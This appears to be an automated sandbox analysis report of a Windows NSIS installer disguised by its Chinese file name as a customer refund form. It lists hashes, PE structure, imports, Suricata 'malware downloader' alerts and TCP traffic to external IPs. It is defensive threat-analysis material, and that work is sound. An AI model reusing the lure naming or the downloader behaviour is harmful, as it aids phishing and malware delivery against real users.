                                                                                                                                    Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"...............................................................................BQ.k....9...'....g...........s...nS..-........S..z..v2.>..=\....@.......................Z.v.h...^.9Q.B^{v&.o.B.av.8...>On..Z..kC.I-.<................M...?,.....t.....................Qf...N.j.K.........N....^~7`k.......5.5......z.8..3F..N.k.Wc.q....vy.l|..K.Z..H(................~[...qv....Ju.8.F.0...Cb.V..F...lT...@.G.....Dz,.zCc.'R:v..<mk.D.o..{6.v.........>...~...................|.K...........~...k,....suQm...4t+.GoV..Qe....-I....r.s....e.B.n...}.|..kJ..:....1V.V[.<dq...O..../.z..4(^.<G.....1.>.......g...B...........L.sN.NW3.._<.?g....<.:....or.-.f.].M.LK.T.T'.1.V7.Cb4GF..X.Ol...R.......~..w...:S9....&N...Kj.M...k[k........OS...oK@..........g>...,7q...YV.g..^.r..[.4tz.....n.d,.p.a...n..V...1....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                    Entropy (8bit):7.595149385038169
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File size:807'711 bytes
                                                                                                                                    MD5:39550a5532af152df27a096508a0d4e2
                                                                                                                                    SHA1:45317173c2771b28460dc4a473c2532983977de1
                                                                                                                                    SHA256:41b359e55e25d9f92e6f4ea1b88b3cfe7c6ca962075a60ac9417548ad190c41e
                                                                                                                                    SHA512:e4295d86586abd85284e43a7ce1a726f2ea3caa7e55699d9f2c70d72883dc31e6c6a0b2c6506b986f99911109ea42ee94a4a02e09cdc0e26591aad55f336a866
                                                                                                                                    SSDEEP:12288:pe8o3x64EvUa/AWpUyqVMjmtEatY9j4WT2jwl4TODIY703VBJ8k5bCqU:peRx5Ev9VpU5xh7wOqsY7G8kAqU
                                                                                                                                    TLSH:490502C3E44C84B1F81F14F059BE6D5F9F653E6169A0A70A36473646AEFB2E70832907
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:0e9e145301e64703

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x40338f
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    sub esp, 000002D4h
                                                                                                                                    push ebx
                                                                                                                                    push esi
                                                                                                                                    push edi
                                                                                                                                    push 00000020h
                                                                                                                                    pop edi
                                                                                                                                    xor ebx, ebx
                                                                                                                                    push 00008001h
                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                    call dword ptr [004080A4h]
                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                    cmp ax, 00000006h
                                                                                                                                    mov dword ptr [00434EECh], eax
                                                                                                                                    je 00007F80988FFA73h
                                                                                                                                    push ebx
                                                                                                                                    call 00007F8098902D25h
                                                                                                                                    cmp eax, ebx
                                                                                                                                    je 00007F80988FFA69h
                                                                                                                                    push 00000C00h
                                                                                                                                    call eax
                                                                                                                                    mov esi, 004082B0h
                                                                                                                                    push esi
                                                                                                                                    call 00007F8098902C9Fh
                                                                                                                                    push esi
                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                    jne 00007F80988FFA4Ch
                                                                                                                                    push 0000000Ah
                                                                                                                                    call 00007F8098902CF8h
                                                                                                                                    push 00000008h
                                                                                                                                    call 00007F8098902CF1h
                                                                                                                                    push 00000006h
                                                                                                                                    mov dword ptr [00434EE4h], eax
                                                                                                                                    call 00007F8098902CE5h
                                                                                                                                    cmp eax, ebx
                                                                                                                                    je 00007F80988FFA71h
                                                                                                                                    push 0000001Eh
                                                                                                                                    call eax
                                                                                                                                    test eax, eax
                                                                                                                                    je 00007F80988FFA69h
                                                                                                                                    or byte ptr [00434EEFh], 00000040h
                                                                                                                                    push ebp
                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                    push ebx
                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                    mov dword ptr [00434FB8h], eax
                                                                                                                                    push ebx
                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                    push 000002B4h
                                                                                                                                    push eax
                                                                                                                                    push ebx
                                                                                                                                    push 0042B208h
                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                    push 0040A2C8h

                                                                                                                                    Rich Headers

                                                                                                                                    Programming Language:
                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x32ad8.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x66270x68008c030dfed318c62753a7b0d60218279bFalse0.6642503004807693data6.452235553722483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .ndata0x350000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .rsrc0x510000x32ad80x32c0068dff99d24fcda1f8c2794c6305009e0False0.4619477370689655data5.570331544131782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_ICON0x514480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.266133325446587
                                                                                                                                    RT_ICON0x61c700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3711898255202859
                                                                                                                                    RT_ICON0x6b1180x8178PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.994538981414434
                                                                                                                                    RT_ICON0x732900x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.40083179297597044
                                                                                                                                    RT_ICON0x787180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3754133207368918
                                                                                                                                    RT_ICON0x7c9400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4678423236514523
                                                                                                                                    RT_ICON0x7eee80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5004690431519699
                                                                                                                                    RT_ICON0x7ff900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.552771855010661
                                                                                                                                    RT_ICON0x80e380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6028688524590164
                                                                                                                                    RT_ICON0x817c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7044223826714802
                                                                                                                                    RT_ICON0x820680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.6180875576036866
                                                                                                                                    RT_ICON0x827300x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4667630057803468
                                                                                                                                    RT_ICON0x82c980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6693262411347518
                                                                                                                                    RT_DIALOG0x831000x100dataEnglishUnited States0.5234375
                                                                                                                                    RT_DIALOG0x832000x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                    RT_DIALOG0x833200xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                    RT_DIALOG0x833e80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                    RT_GROUP_ICON0x834480xbcdataEnglishUnited States0.6542553191489362
                                                                                                                                    RT_VERSION0x835080x28cPGP symmetric key encrypted data - Plaintext or unencrypted dataEnglishUnited States0.5
                                                                                                                                    RT_MANIFEST0x837980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                    Possible Origin

                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-11-20T10:10:37.128035+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749971172.217.23.110443TCP
                                                                                                                                    2024-11-20T10:10:43.536222+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749973193.122.130.080TCP
                                                                                                                                    2024-11-20T10:10:47.947108+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749973193.122.130.080TCP
                                                                                                                                    2024-11-20T10:10:51.096264+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749973193.122.130.080TCP
                                                                                                                                    2024-11-20T10:10:52.341659+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749973193.122.130.080TCP
                                                                                                                                    2024-11-20T10:10:52.893472+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749975188.114.96.3443TCP
                                                                                                                                    2024-11-20T10:10:53.435578+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749976193.122.130.080TCP
                                                                                                                                    2024-11-20T10:10:54.026390+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749977188.114.96.3443TCP
                                                                                                                                    2024-11-20T10:10:55.140126+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749979188.114.96.3443TCP
                                                                                                                                    2024-11-20T10:11:02.291271+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749984188.114.96.3443TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 20, 2024 10:10:36.070604086 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.070642948 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.070700884 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.088685036 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.088697910 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.728960037 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.729043961 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.730107069 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.730290890 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.817328930 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.817368984 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.818433046 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:36.818509102 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.827615023 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:36.875338078 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.128082037 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.128204107 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:37.128233910 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.128348112 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:37.128395081 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:37.128479958 CET44349971172.217.23.110192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.128787994 CET49971443192.168.2.7172.217.23.110
                                                                                                                                    Nov 20, 2024 10:10:37.158729076 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.158833027 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.159034014 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.159275055 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.159311056 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.823767900 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.823899984 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.827629089 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.827652931 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.828078032 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.828151941 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.841788054 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:37.883380890 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.262777090 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.263041019 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.267127991 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.267199039 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.278870106 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.279185057 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.279206991 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.279300928 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.284811974 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.284883976 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.350722075 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.350927114 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.351017952 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.351016998 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.351016998 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.351047993 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.351070881 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.354161024 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.354180098 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.354237080 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.356626987 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.356683016 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.356709003 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.356758118 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.362870932 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.362929106 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.363037109 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.363086939 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.368230104 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.368290901 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.368341923 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.368387938 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.375063896 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.375121117 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.375165939 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.375215054 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.380990028 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.381043911 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.381113052 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.381156921 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.389060020 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.389142990 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.389432907 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.389484882 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.395417929 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.395497084 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.395528078 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.395586967 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.400748014 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.400801897 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.400924921 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.400974989 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.406591892 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.406650066 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.406663895 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.406755924 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.415800095 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.415859938 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.421477079 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.421531916 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.421643019 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.421693087 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442257881 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442327023 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442342997 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442397118 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442536116 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442585945 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442596912 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442637920 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442646980 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442661047 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.442687035 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.442781925 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.443145990 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.443196058 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.443399906 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.443450928 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.444370031 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.444436073 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.444444895 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.444504976 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.447720051 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.447774887 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.449040890 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.449198961 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.451853991 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.451914072 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.451931953 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.451983929 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.462806940 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.462861061 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.462867022 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.462873936 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.462908983 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.462946892 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.463170052 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.463217974 CET49972443192.168.2.7142.250.186.33
                                                                                                                                    Nov 20, 2024 10:10:40.468795061 CET44349972142.250.186.33192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.468847036 CET49972443192.168.2.7142.250.186.33
